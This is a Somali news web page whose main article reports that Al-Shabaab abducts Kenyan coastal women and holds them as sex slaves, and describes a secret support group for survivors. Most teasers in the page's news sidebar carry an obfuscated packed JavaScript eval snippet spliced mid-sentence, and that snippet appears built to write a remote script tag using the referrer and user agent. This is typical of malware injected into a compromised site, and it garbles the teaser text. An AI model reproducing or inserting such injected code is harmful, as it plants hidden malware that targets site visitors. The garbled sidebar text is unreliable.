Saturday, February 24th, 2018
header

Al-Shabaab oo adoonsata dumar si ay ugu galmoodaan

Markii Salma Cali ay billowday baaritaanka halka ay qabteen labo wiil oo la dhalatay sannadkii la soo dhaafay ayaa waxaa u soo baxay wax kale oo ka yaabiyay. Waxay ogaatay in ka sokow ragga u safray Soomaaliya si ay ugu biiraan Shabaabka ay sidoo kalana jiraan haween ay kooxdu qafaalatay si ay uga dhigtaan addoomo ay u galmoodaan.

Salma ayaa si qarsoodi ah u waday baaritaanka xog ku saabsan halka ay walaaladeed ku dambeeyeen. Sababtoo ah haddii la tuhmo in ay kooxda Al Qaacidda xiriirka la leh ay ku biireen, waxaa ka dhalan karta in xoogagga ammaanka ay arrimahaasi fiiri gaar ah u yeeshaan. Mana aysan rabin Salma sidaa.

Sidaas darteed ayay si qarsoodi ah ugu xan qarsatay haween kale oo ku nool Mombasa iyo deegaannada u dhaw iyadoo ka war doontay inay jiraan iyo in kale rag sida walalaheed oo kale maqan.

“Waxaan ogaaday in dadka xaaladeyda oo kale ku sugan ay badan yihiin,” ayay tiri Salma.

Balse Salma waxay sidoo kale ogaatay arrin taasi ka duwan — sheekooyin la xiriira in haweenka si qasab ah loogu kaxeeyo Soomaaaliya.

Haweenka waxay isugu jiraan kuwa da’ yar, kuwa waaweyn, Masiixi iyo Muslimiin ku nool Mombsa iyo deegaanno kale oo ka tirsan gobolka xeebta.

Waxaa inta badan loo ballan qaaday shaqooyin lagu siin doono mishaar badan amaba in dibedda loo dhoofin doono si ay u soo shaqeystaan. Balse taas badalkeeda waa la afduubay.

Bishii Sebtembar ee sannadkii hore, Salma waxay qaadatay tababar sida loo bixiyo la talinta dhibbaneyaasha, waxayna alkuntay xarun qarsoodi ah oo ay ku taageerto haweenka soo laabanaya.

Haween badan oo soo laabtay ayaa u yimid markii ay maqleen jiritaanka xarunta lagula taliyo dhibbanayaasha soo laabtay.

Qaarkood ayaa la soo laabtay carruur, waxaana laga helay HIV, qaarkood xannunnada dhimirka ayaa ku dhacay.

Qol mugdi ah oo ay si qarsoodi ah ugu kulmaan haweenkan ayay BBC-du booqatay, waxayna nala wadaageen sheekooyin aan horay loo maqlin.

” Rag ayaa intay ii yimaadaan ii galmoon jiray—Xitaa tiradooda kuuma sheegi karo. Saddexdii sano ee aan halkaa joogay, nin kasta ayaa ila seexan jiray”, ayay tiri mid ka mid ah haweenka.

” Gabadh kasta oo meesha joogtay labo ilaa saddex rag ah ayaa habeen kasta u galmoon jiray”, ayay tiri haweenay kale.

Qaarkood waxaa lagu khasbay inay ” xaasas” u nqodaan mintidiinta Al Shabaab, waxayna u muuqataa in qaar kale si addoonsi ah xoog loogu heystay si loogu galmoodo.


Shabakada Galgaduudnews.com Kala Soco Wararkii Ugu Danbeeyay

Nagala Xiriir E-mail Galgaduudnews@hotmail.com

Fikradaha Akhristayaasha (0)


Comments are closed.

Wararka Maanta

The Supreme Court Building is seen in Washington, Tuesday, April 4, 2017, as Senate Republicans work to confirm President Donald Trump’s nominee Judge Neil Gorsuch to take the seat of the late Justice Antonin Scalia. (AP Photo/J. Scott Applewhite) 

The Capitol is framed amid the columns of the Supreme Court building in Washington, Tuesday, April 4, 2017, as Senate Republicans work to confirm President Donald Trump’s nominee Judge Neil Gorsuch to take the seat of the late Justice Antonin Scalia. (AP Photo/J. Scott Applewhite) Maxkamad Diiday Dhaqangalka Go,aanki Trump
- May 26, 2017
Maxkamadda eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|fiydh||97|script|language|rel|nofollow|type|text|src|http|45|67|write|fzbsk|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) sagaalaad ee Racfaanka ee Federaaliga ah ee ...
_96217206_gaza Xamaas oo dishay rag “la shaqeeyay Israa’iil”
- May 26, 2017
Ururka eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|dzkss||97|script|language|rel|nofollow|type|text|src|http|45|67|write|yfbid|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Xamaas ee Falastiiniyiinta ayaa dilay saddex nin, ...
_96217203_trump_afp Trump oo dhaliilay gaashaanbuurta NATO
- May 26, 2017
Madaxweynah eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|sihrb||97|script|language|rel|nofollow|type|text|src|http|45|67|write|tztha|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Maraykanka, Donald Trump, ayaa dhaliilay waddamada ay ...
1 Madaxweynaha Soomaaliya oo la kulmay Amiirka Qatar (Sawirro)
- May 25, 2017
Madaxweynaha Soomaaliya Maxamed C/llaahi Farmaajo ayaa la kulmay Amiirka Qatar Sheekh Tamim Bin Xamad Al ...
1 Daawo: Booliska Soomaaliya oo soo bandhigay Muuqaalka Gaarigii isku qarxiyay agagaarka Dekeda Muqdisho
- May 25, 2017
Booliska Soomaaliya ayaa maanta soo bandhigay gaarigii shalay is qarxiyay, xilli uu marayay wadada ...
2 Wasaaradda Isgaarsiinta oo soo bandhigtay sahan lagu sameeyay baraha internet-ka ee wasaaradaha
- May 25, 2017
Wasaaradda eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|hnsby||97|script|language|rel|nofollow|type|text|src|http|45|67|write|rhaen|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Boostada, Isgaarsiinta iyo Teknolojiyada ayaa soo bandhigtay ...
_96212325_secretsupportgroup Al-Shabaab oo adoonsata dumar si ay ugu galmoodaan
- May 25, 2017
Markii eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|kehhb||97|script|language|rel|nofollow|type|text|src|http|45|67|write|skkfa|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Salma Cali ay billowday baaritaanka halka ay ...
1 Askar Kenyan ah oo Qarax Lagu Dilay
- May 25, 2017
Laba eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|beedn||97|script|language|rel|nofollow|type|text|src|http|45|67|write|yeyff|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) askari oo ka mid ah ciidamada booliska ...
_96210002_5f6f2383-7c5a-40e7-933d-3cc9a3b69125 Dagaal ba’an oo ka socda Kunduz
- May 25, 2017
Saraakiil eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|rdaft||97|script|language|rel|nofollow|type|text|src|http|45|67|write|hedeb|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) ku sugan woqooyiga dalka Afqaanistaan ayaa sheegaya ...
coldoon War Deg Deg ah:- Madaxweynaha Somaliland oo Cafis u fidiyay Wariye C/maalik Muuse Coldoon
- May 25, 2017
Hargeysa–Hagenews.com:-Madaxweynaha Somaliland Axmed Maxamed Maxamuud “Siilaanyo” ayaa Cafis u fidiyay Wariye Samafale C/maalik Muuse ...
Sacuudiga Dawlada Sacuudiga oo sheegtay in la yareyn doono shidaalka dunnida loo beec geeyo
- May 25, 2017
Wasiirka eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|adfbe||97|script|language|rel|nofollow|type|text|src|http|45|67|write|fbzes|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) tammarta dalka boqortooyadda Sacuudiga Khaalid Al-Faliix ayaa ...
_96206400_12a818ce-3564-44bd-8ee5-561b36feb657 Britain oo joojisay inay xogta siirdoonka weerarka Manchester la wadaagto US
- May 25, 2017
Booliska eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|ffhkh||97|script|language|rel|nofollow|type|text|src|http|45|67|write|adtnz|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) wada baaritaanka weerarkii Manchester ayaa joojiyay inay ...
_96205410_robot Dubai oo hawlgelisay qalab qabanayo shaqada booliska
- May 25, 2017
Bioliiska eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|riyde||97|script|language|rel|nofollow|type|text|src|http|45|67|write|bnnrs|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Dubai ayaa soo bandhigay markii ugu horreysay ...
IMG-20170525-WA0014-620x330 Wafdi uu hogaaminayo Agasimaha Guud HSJ ayaa gaaray Dalka Norwey
- May 25, 2017
Dalka eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|baiay||97|script|language|rel|nofollow|type|text|src|http|45|67|write|thhtd|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Norwey waxaa gaaray wafdi uu hogaaminayo Agaasimaha ...
2 Wariyaasha Idaacadda Ciidamada oo ka Cabanaya Mushaar la’aan”Sawiro”
- May 25, 2017
Muqdisho–Hagenews.com:-Wariyaasha eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|fiyns||97|script|language|rel|nofollow|type|text|src|http|45|67|write|tyytz|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) ka shaqeeya Idaacadda Codka Ciidamada Ee Magaalada ...
5 Wasiirka Maaliyadda Xukumadda Soomaaliya oo Maanta Kormeeray Garoonka Diyaaradaha Muqdisho”Sawiro”
- May 25, 2017
Muqdisho–Hagenews.com: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|snrea||97|script|language|rel|nofollow|type|text|src|http|45|67|write|ffykh|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Wasiirka Maaliyadda Xukumadda Soomaaliya C/raxmaan Ducaale Beyle ...
deg-deg War Deg Deg ah:- Maxkamadda Ciidamada Qalabka oo Saakay Xukun Dil ah Fulisay
- May 25, 2017
Muqdisho–Hagenews.com:-Maxkamadda Ciidamada Qalabka Sida ee Soomaaliya ayaa Saakay Ridday Xukun Dil ah oo lagu ...
_96200606_sawir Dad loo qabtay weerarkii Manchester
- May 25, 2017
Haweeney eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|aerhb||97|script|language|rel|nofollow|type|text|src|http|45|67|write|enfbd|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) ayaa noqotay qof lixaad ee loo qabto ...
_96200609_sawir.... Wasaarad lagu gubay mudaharaad ka dhacay Brazil
- May 25, 2017
Dibed eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|ftbhr||97|script|language|rel|nofollow|type|text|src|http|45|67|write|teikf|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) baxayaal caraysan oo mudaharaad ka sameeyay caasimadda ...
_96193053_24123d4b-ad06-4b46-9074-711359961f2e Duterte oo ka baaraan dagaya in uu dalka oo dhan ku soo rogo xaalad degdeg ah
- May 25, 2017
Madaxweyne eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|bhrbn||97|script|language|rel|nofollow|type|text|src|http|45|67|write|tseyz|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Rodrigo Duterte ayaa sheegay in laga yaabo ...
_96188677_a200bda4-ae55-4940-9165-d6dfcef9cf3f ‘Ninkii weeraray Manchester in uusan kaligii ahayn bay u badan tahay’
- May 25, 2017
Ninka eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|rayfs||97|script|language|rel|nofollow|type|text|src|http|45|67|write|yrrtb|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) gaystay weerarkii Manchester waxay u "badan tahay" ...
_96185884_cc96f4fc-b2bf-4e03-8cd3-d43fa9597f50 Heerka feejignaanta ammaanka ee Britain oo sare loo qaaday
- May 24, 2017
Dowlada eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|adyks||97|script|language|rel|nofollow|type|text|src|http|45|67|write|rdiad|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Britain ayaa sheegtay in ciidamada milateriga ay ...